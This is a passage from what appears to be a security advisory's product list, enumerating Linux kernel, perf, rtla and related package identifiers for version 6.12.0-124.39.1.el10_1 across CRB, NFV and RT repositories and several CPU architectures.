"CRB-10.1.Z:kernel-rt-debug-devel-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-debug-devel-0:6.12.0-124.39.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-rt-debug-modules-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-debug-modules-0:6.12.0-124.39.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-rt-debug-modules-core-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-debug-modules-core-0:6.12.0-124.39.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-rt-debug-modules-extra-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-debug-modules-extra-0:6.12.0-124.39.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-rt-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-debuginfo-0:6.12.0-124.39.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-rt-devel-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-devel-0:6.12.0-124.39.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-rt-modules-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-modules-0:6.12.0-124.39.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-rt-modules-core-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-modules-core-0:6.12.0-124.39.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-rt-modules-extra-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-modules-extra-0:6.12.0-124.39.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-tools-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-tools-0:6.12.0-124.39.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-tools-0:6.12.0-124.39.1.el10_1.s390x",
"CRB-10.1.Z:kernel-tools-0:6.12.0-124.39.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.39.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.39.1.el10_1.s390x",
"CRB-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.39.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-tools-libs-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-tools-libs-0:6.12.0-124.39.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-tools-libs-0:6.12.0-124.39.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-tools-libs-devel-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-tools-libs-devel-0:6.12.0-124.39.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-tools-libs-devel-0:6.12.0-124.39.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-uki-virt-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-uki-virt-0:6.12.0-124.39.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-uki-virt-addons-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-uki-virt-addons-0:6.12.0-124.39.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-zfcpdump-0:6.12.0-124.39.1.el10_1.s390x",
"CRB-10.1.Z:kernel-zfcpdump-core-0:6.12.0-124.39.1.el10_1.s390x",
"CRB-10.1.Z:kernel-zfcpdump-debuginfo-0:6.12.0-124.39.1.el10_1.s390x",
"CRB-10.1.Z:kernel-zfcpdump-devel-0:6.12.0-124.39.1.el10_1.s390x",
"CRB-10.1.Z:kernel-zfcpdump-devel-matched-0:6.12.0-124.39.1.el10_1.s390x",
"CRB-10.1.Z:kernel-zfcpdump-modules-0:6.12.0-124.39.1.el10_1.s390x",
"CRB-10.1.Z:kernel-zfcpdump-modules-core-0:6.12.0-124.39.1.el10_1.s390x",
"CRB-10.1.Z:kernel-zfcpdump-modules-extra-0:6.12.0-124.39.1.el10_1.s390x",
"CRB-10.1.Z:libperf-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:libperf-0:6.12.0-124.39.1.el10_1.ppc64le",
"CRB-10.1.Z:libperf-0:6.12.0-124.39.1.el10_1.s390x",
"CRB-10.1.Z:libperf-0:6.12.0-124.39.1.el10_1.x86_64",
"CRB-10.1.Z:libperf-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:libperf-debuginfo-0:6.12.0-124.39.1.el10_1.ppc64le",
"CRB-10.1.Z:libperf-debuginfo-0:6.12.0-124.39.1.el10_1.s390x",
"CRB-10.1.Z:libperf-debuginfo-0:6.12.0-124.39.1.el10_1.x86_64",
"CRB-10.1.Z:perf-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:perf-0:6.12.0-124.39.1.el10_1.ppc64le",
"CRB-10.1.Z:perf-0:6.12.0-124.39.1.el10_1.s390x",
"CRB-10.1.Z:perf-0:6.12.0-124.39.1.el10_1.x86_64",
"CRB-10.1.Z:perf-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:perf-debuginfo-0:6.12.0-124.39.1.el10_1.ppc64le",
"CRB-10.1.Z:perf-debuginfo-0:6.12.0-124.39.1.el10_1.s390x",
"CRB-10.1.Z:perf-debuginfo-0:6.12.0-124.39.1.el10_1.x86_64",
"CRB-10.1.Z:python3-perf-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:python3-perf-0:6.12.0-124.39.1.el10_1.ppc64le",
"CRB-10.1.Z:python3-perf-0:6.12.0-124.39.1.el10_1.s390x",
"CRB-10.1.Z:python3-perf-0:6.12.0-124.39.1.el10_1.x86_64",
"CRB-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.39.1.el10_1.ppc64le",
"CRB-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.39.1.el10_1.s390x",
"CRB-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.39.1.el10_1.x86_64",
"CRB-10.1.Z:rtla-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:rtla-0:6.12.0-124.39.1.el10_1.ppc64le",
"CRB-10.1.Z:rtla-0:6.12.0-124.39.1.el10_1.s390x",
"CRB-10.1.Z:rtla-0:6.12.0-124.39.1.el10_1.x86_64",
"CRB-10.1.Z:rv-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:rv-0:6.12.0-124.39.1.el10_1.ppc64le",
"CRB-10.1.Z:rv-0:6.12.0-124.39.1.el10_1.s390x",
"CRB-10.1.Z:rv-0:6.12.0-124.39.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-0:6.12.0-124.39.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-0:6.12.0-124.39.1.el10_1.s390x",
"NFV-10.1.Z:kernel-0:6.12.0-124.39.1.el10_1.src",
"NFV-10.1.Z:kernel-0:6.12.0-124.39.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-64k-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-64k-core-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-64k-debug-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-64k-debug-core-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-64k-debug-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-64k-debug-devel-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-64k-debug-devel-matched-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-64k-debug-modules-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-64k-debug-modules-core-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-64k-debug-modules-extra-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-64k-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-64k-devel-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-64k-devel-matched-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-64k-modules-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-64k-modules-core-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-64k-modules-extra-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-abi-stablelists-0:6.12.0-124.39.1.el10_1.noarch",
"NFV-10.1.Z:kernel-core-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-core-0:6.12.0-124.39.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-core-0:6.12.0-124.39.1.el10_1.s390x",
"NFV-10.1.Z:kernel-core-0:6.12.0-124.39.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-debug-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-debug-0:6.12.0-124.39.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-debug-0:6.12.0-124.39.1.el10_1.s390x",
"NFV-10.1.Z:kernel-debug-0:6.12.0-124.39.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-debug-core-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-debug-core-0:6.12.0-124.39.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-debug-core-0:6.12.0-124.39.1.el10_1.s390x",
"NFV-10.1.Z:kernel-debug-core-0:6.12.0-124.39.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.39.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.39.1.el10_1.s390x",
"NFV-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.39.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-debug-devel-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-debug-devel-0:6.12.0-124.39.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-debug-devel-0:6.12.0-124.39.1.el10_1.s390x",
"NFV-10.1.Z:kernel-debug-devel-0:6.12.0-124.39.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.39.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.39.1.el10_1.s390x",
"NFV-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.39.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-debug-modules-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-debug-modules-0:6.12.0-124.39.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-debug-modules-0:6.12.0-124.39.1.el10_1.s390x",
"NFV-10.1.Z:kernel-debug-modules-0:6.12.0-124.39.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.39.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.39.1.el10_1.s390x",
"NFV-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.39.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.39.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.39.1.el10_1.s390x",
"NFV-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.39.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-debug-uki-virt-0:6.12.0-124.39.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-debuginfo-0:6.12.0-124.39.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-debuginfo-0:6.12.0-124.39.1.el10_1.s390x",
"NFV-10.1.Z:kernel-debuginfo-0:6.12.0-124.39.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-debuginfo-common-aarch64-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-debuginfo-common-ppc64le-0:6.12.0-124.39.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-debuginfo-common-s390x-0:6.12.0-124.39.1.el10_1.s390x",
"NFV-10.1.Z:kernel-debuginfo-common-x86_64-0:6.12.0-124.39.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-devel-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-devel-0:6.12.0-124.39.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-devel-0:6.12.0-124.39.1.el10_1.s390x",
"NFV-10.1.Z:kernel-devel-0:6.12.0-124.39.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-devel-matched-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-devel-matched-0:6.12.0-124.39.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-devel-matched-0:6.12.0-124.39.1.el10_1.s390x",
"NFV-10.1.Z:kernel-devel-matched-0:6.12.0-124.39.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-doc-0:6.12.0-124.39.1.el10_1.noarch",
"NFV-10.1.Z:kernel-modules-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-modules-0:6.12.0-124.39.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-modules-0:6.12.0-124.39.1.el10_1.s390x",
"NFV-10.1.Z:kernel-modules-0:6.12.0-124.39.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-modules-core-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-modules-core-0:6.12.0-124.39.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-modules-core-0:6.12.0-124.39.1.el10_1.s390x",
"NFV-10.1.Z:kernel-modules-core-0:6.12.0-124.39.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-modules-extra-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-modules-extra-0:6.12.0-124.39.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-modules-extra-0:6.12.0-124.39.1.el10_1.s390x",
"NFV-10.1.Z:kernel-modules-extra-0:6.12.0-124.39.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.39.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.39.1.el10_1.s390x",
"NFV-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.39.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-rt-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-0:6.12.0-124.39.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-rt-64k-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-64k-core-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-64k-debug-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-64k-debug-core-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-64k-debug-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-64k-debug-devel-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-64k-debug-modules-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-64k-debug-modules-core-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-64k-debug-modules-extra-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-64k-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-64k-devel-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-64k-modules-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-64k-modules-core-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-64k-modules-extra-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-core-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-core-0:6.12.0-124.39.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-rt-debug-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-debug-0:6.12.0-124.39.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-rt-debug-core-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-debug-core-0:6.12.0-124.39.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-rt-debug-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-debug-debuginfo-0:6.12.0-124.39.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-rt-debug-devel-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-debug-devel-0:6.12.0-124.39.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-rt-debug-modules-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-debug-modules-0:6.12.0-124.39.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-rt-debug-modules-core-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-debug-modules-core-0:6.12.0-124.39.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-rt-debug-modules-extra-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-debug-modules-extra-0:6.12.0-124.39.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-rt-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-debuginfo-0:6.12.0-124.39.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-rt-devel-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-devel-0:6.12.0-124.39.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-rt-modules-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-modules-0:6.12.0-124.39.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-rt-modules-core-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-modules-core-0:6.12.0-124.39.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-rt-modules-extra-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-modules-extra-0:6.12.0-124.39.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-tools-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-tools-0:6.12.0-124.39.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-tools-0:6.12.0-124.39.1.el10_1.s390x",
"NFV-10.1.Z:kernel-tools-0:6.12.0-124.39.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.39.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.39.1.el10_1.s390x",
"NFV-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.39.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-tools-libs-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-tools-libs-0:6.12.0-124.39.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-tools-libs-0:6.12.0-124.39.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-tools-libs-devel-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-tools-libs-devel-0:6.12.0-124.39.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-tools-libs-devel-0:6.12.0-124.39.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-uki-virt-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-uki-virt-0:6.12.0-124.39.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-uki-virt-addons-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-uki-virt-addons-0:6.12.0-124.39.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-zfcpdump-0:6.12.0-124.39.1.el10_1.s390x",
"NFV-10.1.Z:kernel-zfcpdump-core-0:6.12.0-124.39.1.el10_1.s390x",
"NFV-10.1.Z:kernel-zfcpdump-debuginfo-0:6.12.0-124.39.1.el10_1.s390x",
"NFV-10.1.Z:kernel-zfcpdump-devel-0:6.12.0-124.39.1.el10_1.s390x",
"NFV-10.1.Z:kernel-zfcpdump-devel-matched-0:6.12.0-124.39.1.el10_1.s390x",
"NFV-10.1.Z:kernel-zfcpdump-modules-0:6.12.0-124.39.1.el10_1.s390x",
"NFV-10.1.Z:kernel-zfcpdump-modules-core-0:6.12.0-124.39.1.el10_1.s390x",
"NFV-10.1.Z:kernel-zfcpdump-modules-extra-0:6.12.0-124.39.1.el10_1.s390x",
"NFV-10.1.Z:libperf-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:libperf-0:6.12.0-124.39.1.el10_1.ppc64le",
"NFV-10.1.Z:libperf-0:6.12.0-124.39.1.el10_1.s390x",
"NFV-10.1.Z:libperf-0:6.12.0-124.39.1.el10_1.x86_64",
"NFV-10.1.Z:libperf-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:libperf-debuginfo-0:6.12.0-124.39.1.el10_1.ppc64le",
"NFV-10.1.Z:libperf-debuginfo-0:6.12.0-124.39.1.el10_1.s390x",
"NFV-10.1.Z:libperf-debuginfo-0:6.12.0-124.39.1.el10_1.x86_64",
"NFV-10.1.Z:perf-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:perf-0:6.12.0-124.39.1.el10_1.ppc64le",
"NFV-10.1.Z:perf-0:6.12.0-124.39.1.el10_1.s390x",
"NFV-10.1.Z:perf-0:6.12.0-124.39.1.el10_1.x86_64",
"NFV-10.1.Z:perf-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:perf-debuginfo-0:6.12.0-124.39.1.el10_1.ppc64le",
"NFV-10.1.Z:perf-debuginfo-0:6.12.0-124.39.1.el10_1.s390x",
"NFV-10.1.Z:perf-debuginfo-0:6.12.0-124.39.1.el10_1.x86_64",
"NFV-10.1.Z:python3-perf-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:python3-perf-0:6.12.0-124.39.1.el10_1.ppc64le",
"NFV-10.1.Z:python3-perf-0:6.12.0-124.39.1.el10_1.s390x",
"NFV-10.1.Z:python3-perf-0:6.12.0-124.39.1.el10_1.x86_64",
"NFV-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.39.1.el10_1.ppc64le",
"NFV-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.39.1.el10_1.s390x",
"NFV-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.39.1.el10_1.x86_64",
"NFV-10.1.Z:rtla-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:rtla-0:6.12.0-124.39.1.el10_1.ppc64le",
"NFV-10.1.Z:rtla-0:6.12.0-124.39.1.el10_1.s390x",
"NFV-10.1.Z:rtla-0:6.12.0-124.39.1.el10_1.x86_64",
"NFV-10.1.Z:rv-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:rv-0:6.12.0-124.39.1.el10_1.ppc64le",
"NFV-10.1.Z:rv-0:6.12.0-124.39.1.el10_1.s390x",
"NFV-10.1.Z:rv-0:6.12.0-124.39.1.el10_1.x86_64",
"RT-10.1.Z:kernel-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-0:6.12.0-124.39.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-0:6.12.0-124.39.1.el10_1.s390x",
"RT-10.1.Z:kernel-0:6.12.0-124.39.1.el10_1.src",
"RT-10.1.Z:kernel-0:6.12.0-124.39.1.el10_1.x86_64",
"RT-10.1.Z:kernel-64k-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-64k-core-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-64k-debug-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-64k-debug-core-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-64k-debug-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-64k-debug-devel-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-64k-debug-devel-matched-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-64k-debug-modules-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-64k-debug-modules-core-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-64k-debug-modules-extra-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-64k-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-64k-devel-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-64k-devel-matched-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-64k-modules-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-64k-modules-core-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-64k-modules-extra-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-abi-stablelists-0:6.12.0-124.39.1.el10_1.noarch",
"RT-10.1.Z:kernel-core-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-core-0:6.12.0-124.39.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-core-0:6.12.0-124.39.1.el10_1.s390x",
"RT-10.1.Z:kernel-core-0:6.12.0-124.39.1.el10_1.x86_64",
"RT-10.1.Z:kernel-debug-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-debug-0:6.12.0-124.39.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-debug-0:6.12.0-124.39.1.el10_1.s390x",
"RT-10.1.Z:kernel-debug-0:6.12.0-124.39.1.el10_1.x86_64",
"RT-10.1.Z:kernel-debug-core-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-debug-core-0:6.12.0-124.39.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-debug-core-0:6.12.0-124.39.1.el10_1.s390x",
"RT-10.1.Z:kernel-debug-core-0:6.12.0-124.39.1.el10_1.x86_64",
"RT-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.39.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.39.1.el10_1.s390x",
"RT-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.39.1.el10_1.x86_64",
"RT-10.1.Z:kernel-debug-devel-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-debug-devel-0:6.12.0-124.39.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-debug-devel-0:6.12.0-124.39.1.el10_1.s390x",
"RT-10.1.Z:kernel-debug-devel-0:6.12.0-124.39.1.el10_1.x86_64",
"RT-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.39.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.39.1.el10_1.s390x",
"RT-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.39.1.el10_1.x86_64",
"RT-10.1.Z:kernel-debug-modules-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-debug-modules-0:6.12.0-124.39.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-debug-modules-0:6.12.0-124.39.1.el10_1.s390x",
"RT-10.1.Z:kernel-debug-modules-0:6.12.0-124.39.1.el10_1.x86_64",
